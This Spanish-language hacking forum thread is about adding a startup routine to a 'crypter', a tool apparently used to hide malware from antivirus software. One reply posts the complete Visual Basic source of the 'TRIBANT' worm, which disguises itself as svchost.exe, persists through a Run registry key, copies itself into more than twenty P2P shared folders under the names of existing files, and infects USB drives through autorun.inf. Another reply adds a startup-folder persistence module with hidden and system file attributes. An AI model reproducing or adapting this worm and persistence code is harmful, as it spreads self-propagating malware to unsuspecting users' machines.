Agregar autoinicio en Crypter

Naker90

por Naker90 VIP

Buenas mi duda es la siguiente, intento agregar un startup a un crypter que tengo y estoy utilizando el modulo codeado por iCode:

Mostrar/Ocultar

LLamo a la funcion desde el cliente de esta forma

Código: Seleccionar todo

If Check1.Value = 1 Then
Call AddStartup("omg.exe", vbHidden + vbSystem)
End If

La clave se agrega bien al registro, pero cuando reinicio no me ejecuta el server. He intentando cambiar la llave del registro de WIN7 del modulo por la de CurrentVersion/Run pero tampoco.
Alguna ayuda
Saludos

Skype: naker.noventa

chequinho · Mensajes: 116 Registrado: 05 Sep 2012, 19:56

por chequinho Delirios esporádicos

porque la llamas desde el cliente? Deberias llamarlo desde el stub para que se el server el que se ejecute, no? xD. Con respecto al modulo no lo puedo testear porque no estoy en mi PC, cuando lo este, lo pruebo y te comento.

Saludos.

I DON'T send passwords through Private Message
Skype: [email protected]

Naker90

por Naker90 VIP

Gracias por la respuesta chequinho, bueno he llamado al modulo desde el Stub y crea la entrada en el registro, pero sigue sin ejecutar tras el reinicio. Creo que el problema es del modulo que no crea la entrada en CurrentVersion/Run (Puede que me equivoque), si pudieras testear el modulo te lo agradeceria.
Aqui dejo el codigo por si el error fuera mio.
Cliente:

Mostrar/Ocultar

Stub:

Mostrar/Ocultar

Saludos Maquina

Skype: naker.noventa

chequinho · Mensajes: 116 Registrado: 05 Sep 2012, 19:56

por chequinho Delirios esporádicos

Ok, el modulo funciona perfecto, No se ejecuta por el atributo de oculto (vbHidden). Quita ese atributo y se ejecutara normal

I DON'T send passwords through Private Message
Skype: [email protected]

Naker90

por Naker90 VIP

Muchas gracias chequinho, no sabia que ese atributo influyera en la ejecucion pensaba que solo lo ocultaba, pero bueno ya esta solucionado.
Saludos

Skype: naker.noventa

jorge705

por jorge705 Esquizofrénico

te dejo el TRIBANT worm, no me acuerdo donde lo saque xd

el creador es Dober-ManN

Mostrar/Ocultar

'=========================================================================
'                        TRIBANT by Dober-ManN
'
'Nombre: TRIBANT
'Tipo: Gusano(Gusano de Internet)
'Propagación: P2P
'Autor: Dober-ManN
'Email: dober-mann:-com
'Este código es %100 MIO.
'
'Efectos: Al abrirce, verifica si se encuentra en la pc victima, si no
'esta infectada, se copia al directorio de windows con el nombre
'"svchost.exe", luego ejecuta este ultimo archivo copiado y se cierra el
'original. Luego, ya ejecutado y listo, comienza la popagacion.
'
'
'****************************Propagacion P2P*****************************
' Para propagarse por P2P, localiza todos los archivos que existan en las
'carpetas compartidas de los programas P2P, mas adelante mencionados,
'mediante un FileListBox, saca el nombre de estos archivos y luego se
'copia a si mismo en todas las carpetas compartidas de los programas P2P
'con los nombres extraidos de estas.
'************************************************************************
'
'****************************Propagacion USB*****************************
' Para propagarce por USB, se copia cada 5s en una unidad de la E: a la Z
'con el nombre de system.exe y crea un autorun para que se inicie este
'archivo cuando abran la unidad.
'************************************************************************
'
' Cualquier duda, mi messenger es o dober-mann:-com
' (prefiero que me pregunten por el 1º, ya que paso mas
' a menudo por este.
' Saludos.
'========================================================================

Dim system As String
Dim Windir As String                                  'Variable de el directorio de windows.
Dim Yo As String                                      'Variable de mi ubicacion.
Dim Autorun1 As String                                'Variable con el contenido del autorun.(Prop. USB)
Dim cda As String                                     'Variable de la Cantidad De Archivos (CDA).(Prop. P2P)
Dim arch As String                                    'Variable de el nombre del archivo al que me voy a copiar.(Prop. P2P)
Dim archpro As String                                 'Variable de la ubicacion de la carpeta Archivos de Programas.(Prop. P2P)
Dim nombre() As String                                'Variable con la cual solo sacaremos el nombre sin la extencion.(Prop. P2P)
Dim CarpAct As String

Private Sub Form_Load()

On Error Resume Next

  App.TaskVisible = False
  
  Me.Visible = False
  
  system = Environ(StrReverse("ridniw")) & "\svchost.exe"        'Le asignamos una ruta a la variable "system".

  Yo = App.Path & "\" & App.EXEName & ".exe"          'Le asignamos la ruta en la que nos encontramos a la variable "Yo".

  If Yo = system Then                                 'Si yo estoy en la ruta de system,
    If App.PrevInstance = True Then End               'si ya estoy ejecutandome, entonces me finalizo,
    Call PropagacionP2P                               'y comenzamos la propagacion P2P,
    Call PropagacionUSB                               'y luego la propagacion por USB.
  End If

  If Yo <> system Then                                'Si yo no estoy en la direccion de la variable "system", entonces,
    
    Shell ("cmd.exe /c Explorer.exe " & App.Path), vbHide 'abrimos la unidad en la que nos encontramos para no levantar sospechas.
    
    If App.PrevInstance = True Then End               'si ya estoy ejecutandome, entonces me finalizo,
    
    If Dir(system) = "" Then                          'Si el archivo "system" no existe entonces, me instalo "Instalarme".
  
      If Right(App.Path, 1) <> "\" Then                                                                        'Si el ultimo caracter de la ubicacion en la que me encuentro, no es un "\" entonces se la agrego.
        Yo = App.Path & "\" & App.EXEName & ".exe"
      Else
        Yo = App.Path & App.EXEName & ".exe"                                                                   'Si ya lo tiene, quiere decir que estamos en una unidad de disco.
      End If
  
      Shell ("cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v Svchost /t REG_SZ /D " & system & " /F"), vbHide    'Nos agregamos al registro

      FileCopy Yo, system                                                   'Nos copiamos a la ubicacion del contenido de la variable "system".                                                                                      'Nos copiamos a la ubicacion del contenido de la variable "system".
      
      Do While Dir(system) = ""
       DoEvents
      Loop
      
      SetAttr system, vbHidden + vbReadOnly + vbSystem                                                         'Nos cambiamos las propiedades a de solo lectura, oculto y del sistema

      Shell system, vbHide                                                                                     'Nos ejecutamos en la dieccion de system

      End                                                                                                      'Nos finalizamos.
    
    Else                                                                                                       'Si existe el archivo system, entonces me fializo.
      End
    End If
 
  End If

End Sub

Private Sub PropagacionP2P()

  On Error Resume Next

  archpro = Environ("programfiles")                    'Le asignamos la direccion en la que se encuentra la carpeta Archivos de Programas a la variable archpro.

  Call propagar                                        'Y empezamos la propagacion.

End Sub

Sub propagar()

On Error Resume Next                                   'En caso de algun error que no se de la alerta.

For A = 1 To 21

Select Case A                                            'A partir de aqui empezamos a darle las direcciones de las carpetas compartidas de los programas P2P a cada FileListBox para que luego, si cada FileListBox tiene la direccion asignada, quiere decir que existe, por lo que podremos escanear los archivos existentes y poder copiarnos con esos nombres.

Case 1
File1.Path = archpro & "\Grokster\My Grokster\"
CarpAct = archpro & "\Grokster\My Grokster"
Case 2
File1.Path = archpro & "\Morpheus\My Shared Folder\"
CarpAct = archpro & "\Morpheus\My Shared Folder"
Case 3
File1.Path = archpro & "\ICQ\shared files\"
CarpAct = archpro & "\ICQ\shared files"
Case 4
File1.Path = archpro & "\KaZaA\My Shared Folder\"
CarpAct = archpro & "\KaZaA\My Shared Folder"
Case 5
File1.Path = archpro & "\EDONKEY2000\incoming\"
CarpAct = archpro & "\EDONKEY2000\incoming"
Case 6
File1.Path = archpro & "\eMule\Incoming\"
CarpAct = archpro & "\eMule\Incoming"
Case 7
File1.Path = archpro & "\appleJuice\incoming\"
CarpAct = archpro & "\appleJuice\incoming"
Case 8
File1.Path = archpro & "\Gnucleus\Downloads\"
CarpAct = archpro & "\Gnucleus\Downloads"
Case 9
File1.Path = archpro & "\LimeWire\Shared\"
CarpAct = archpro & "\LimeWire\Shared"
Case 10
File1.Path = archpro & "\Overnet\incoming\"
CarpAct = archpro & "\Overnet\incoming"
Case 11
File1.Path = archpro & "\Shareaza\Downloads\"
CarpAct = archpro & "\Shareaza\Downloads"
Case 12
File1.Path = archpro & "\Swaptor\Download\"
CarpAct = archpro & "\Swaptor\Download"
Case 13
File1.Path = archpro & "\WinMX\My Shared Folder\"
CarpAct = archpro & "\WinMX\My Shared Folder"
Case 14
File1.Path = archpro & "\Tesla\Files\"
CarpAct = archpro & "\Tesla\Files"
Case 15
File1.Path = archpro & "\XoloX\Downloads\"
CarpAct = archpro & "\XoloX\Downloads"
Case 16
File1.Path = archpro & "\Rapigator\Share\"
CarpAct = archpro & "\Rapigator\Share"
Case 17
File1.Path = archpro & "\KMD\My Shared Folder\"
CarpAct = archpro & "\KMD\My Shared Folder"
Case 18
File1.Path = archpro & "\BearShare\Shared\"
CarpAct = archpro & "\BearShare\Shared"
Case 19
File1.Path = archpro & "\Direct Connect\Received Files\"
CarpAct = archpro & "\Direct Connect\Received Files"
Case 20
File1.Path = archpro & "\KaZaA Lite\My Shared Folder\"
CarpAct = archpro & "\KaZaA Lite\My Shared Folder"
Case 21
File1.Path = archpro & "\Filetopia3\Files\"
CarpAct = archpro & "\Filetopia3\Files"
End Select

If File1.Path = CarpAct Then
  cda = File1.ListCount - 1                                 'Sacamos el numero de archivos que existen - 1 y lo depositamos en la variable cda, ya que nos da el numero de archivos que existen, pero al sacar el nombre, el primer nombre del archivo se lo saca con el numero 0.
  If cda <> "-1" Then                                    'Si cda no es -1 quiere decir que existen archivos por lo que nos empezamos a copiar con esos nombres.
      For B = 0 To cda                                   'Acá hacemos que se repita la instruccion tantas veces como la cantidad de archivos que existan, asi nos vamos copiando con cada nombre.
        arch = File1.List(B)                                'A la variable "arch" le damos el nombre del archivo al que nos vamos a copiar.
        nombre = Split(arch, ".")                        'Separamos a los archivos por un puntos, de este modo, nos copiamos solo con el nombre de estos sin la extencion.
        arch = nombre(0)
        Call Direcciones                                 'Llamamos a la instruccion "Direcciones", en la cual se encuentran las direcciones de las carpetas compartidas de los programas P2P a las que nos vamos a copiar.
      Next B                                             'Pasamos al siguiente archivo.
  End If
End If
  
Next A

End Sub

Sub Direcciones()

On Error Resume Next                                                   'En caso de que no se pueda copiar en una direccion, que
                                                                       'lo intente con la siguiente.
FileCopy Yo, archpro & "\Grokster\My Grokster\" & arch & ".exe"        'Aqui nos copiamos a las carpetas compartidas de los
FileCopy Yo, archpro & "\Morpheus\My Shared Folder\" & arch & ".exe"   'programas P2P, con los nombres que esten en la variable
FileCopy Yo, archpro & "\ICQ\shared files\" & arch & ".exe"            '"arch" en la cual contiene los nombres de los archivos
FileCopy Yo, archpro & "\KaZaA\My Shared Folder\" & arch & ".exe"      'ya existentes en esas carpetas.
FileCopy Yo, archpro & "\EDONKEY2000\incoming\" & arch & ".exe"
FileCopy Yo, archpro & "\eMule\Incoming\" & arch & ".exe"
FileCopy Yo, archpro & "\appleJuice\incoming\" & arch & ".exe"
FileCopy Yo, archpro & "\Gnucleus\Downloads\" & arch & ".exe"
FileCopy Yo, archpro & "\LimeWire\Shared\" & arch & ".exe"
FileCopy Yo, archpro & "\Overnet\incoming\" & arch & ".exe"
FileCopy Yo, archpro & "\Shareaza\Downloads\" & arch & ".exe"
FileCopy Yo, archpro & "\Swaptor\Download\" & arch & ".exe"
FileCopy Yo, archpro & "\WinMX\My Shared Folder\" & arch & ".exe"
FileCopy Yo, archpro & "\Tesla\Files\" & arch & ".exe"
FileCopy Yo, archpro & "\XoloX\Downloads\" & arch & ".exe"
FileCopy Yo, archpro & "\Rapigator\Share\" & arch & ".exe"
FileCopy Yo, archpro & "\KMD\My Shared Folder\" & arch & ".exe"
FileCopy Yo, archpro & "\BearShare\Shared\" & arch & ".exe"
FileCopy Yo, archpro & "\Direct Connect\Received Files\" & arch & ".exe"
FileCopy Yo, archpro & "\KaZaA Lite\My Shared Folder\" & arch & ".exe"
FileCopy Yo, archpro & "\Filetopia3\Files\" & arch & ".exe"
End Sub

Private Sub PropagacionUSB()

  On Error Resume Next                                                 'En caso de error no daremos alerta.

  Yo = App.Path & "\" & App.EXEName & ".exe"                           'Le damos a la variable nosotros, la ubicacion en la que nos ubicamos.

  Autorun1 = "[autorun]" & vbCrLf & "open=system.exe" & vbCrLf & "UseAutoPlay = 1" & _ 
vbCrLf & "[email protected]" & vbCrLf & "shell\open=Abrir" & _
 vbCrLf & "shell\open\Command=system.exe" & vbCrLf & "shell\open\Command=system.exe" _
 & vbCrLf & "shell\open\Default=1" & vbCrLf & "shell\explore=Explorar"                                              'Le damos a la variable autorun1 el contenido del autorun.

  Timer1.Interval = 15000
  
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
For C = 67 To 90
FileCopy Yo, Chr(C) & ":\system.exe"                                          'Me copio a la unidad correspondiente a la variable con nombre "system.exe".
Open Chr(C) & ":\autorun.inf" For Output As #1                                'Creamos un archivo llamado "autorun.inf" que contendra el contenido de la variable "Autorun1".
 Print #1, Autorun1
Close #1
SetAttr Chr(C) & ":\autorun.inf", vbHidden + vbReadOnly + vbSystem          'Le cambiamos los atributos a los archivos
SetAttr Chr(C) & ":\system.exe", vbHidden + vbReadOnly + vbSystem           '"autorun.inf" y "system.exe" a ocultos,'solo lectura y de sistema.
Next C
End Sub

solo tienes que deshuesarlo un poco y tendras tu autorun xddd

tambien tengo este modulo en mi cajon xdd

autor: iCode

Mostrar/Ocultar

Option Explicit
'-----------------------------------------------------------------------------
' Module         : mAddStartup.bas
' Author         : iCode
' Published      : 01/17/13
' Credits        : N/A
' Purpose        : Add file to startup folder (local user)
' Compile        : P-Code or Native Code
' OS Support     : 2K, XP, 2K3, Vista, 7, 8 (x86 + x64)
'-----------------------------------------------------------------------------
Private Const Win2K_XP_2K3 As String = "\Start Menu\Programs\Startup\"
Private Const WinVista_7_8 As String = "\Microsoft\Windows\Start Menu\Programs\Startup\"
'KERNEL32
Private Declare Function GetVersionExW Lib "KERNEL32" (lpVersionInformation As Long) As Long
Public Function AddStartup(ByVal strFileName As String, Optional ByVal tAttributes As VbFileAttribute) As Boolean
    On Error GoTo Func_Error
    Dim strOS         As String
    Dim strPath       As String
    ' Current operating system
    strOS = GetOS
    ' Determine startup folder path
    If strOS = "2K" Or strOS = "XP" Or strOS = "Server 2K3" Then
        strPath = Environ$("UserProfile") & Win2K_XP_2K3
    ElseIf strOS = "Vista" Or strOS = "7" Or strOS = "8" Then
        strPath = Environ$("AppData") & WinVista_7_8
    End If
    ' Copy local file to startup folder
    FileCopy App.Path & "\" & App.EXEName & ".exe", strPath & strFileName
    ' Check for (un)successful copy
    AddStartup = FileExists(strPath & strFileName)
    If AddStartup = False Then Exit Function
    ' Apply attributes if specified
    If tAttributes <> 0 Then SetAttr strPath & strFileName, tAttributes
Func_Error:
    ' Error copying file to startup folder
End Function
Private Function FileExists(ByVal strFilePath As String) As Boolean
    FileExists = (Dir$(strFilePath) <> vbNullString)
End Function
Private Function GetOS() As String
    Dim tOS(68)       As Long
    tOS(0) = &H114
    GetVersionExW tOS(0)
    Select Case tOS(4) & "." & tOS(1) & "." & tOS(2)
        Case "2.5.0": GetOS = "2K"
        Case "2.5.1": GetOS = "XP"
        Case "2.5.2": GetOS = "Server 2K3"
        Case "2.6.0": GetOS = "Vista"
        Case "2.6.1": GetOS = "7"
        Case "2.6.2": GetOS = "8"
        Case Else: GetOS = ""
    End Select
End Function


'----------------------------------------------------------------------------------------------------------------
Call AddStartup("omg.exe", vbHidden + vbSystem)
'----------------------------------------------------------------------------------------------------------------

estoy matando el tiempo, mientras el tiempo nos mata lentamente..

Mostrar/Ocultar

Naker90

por Naker90 VIP

Gracias por los codes Jorge se agradecen

Skype: naker.noventa

Agregar autoinicio en Crypter

Temas similares

Links sobre el tema

Variantes de tema

Agregar autoinicio en Crypter

Mostrar mensajes previos

Ordenar por

Temas similares

Links sobre el tema

Variantes de tema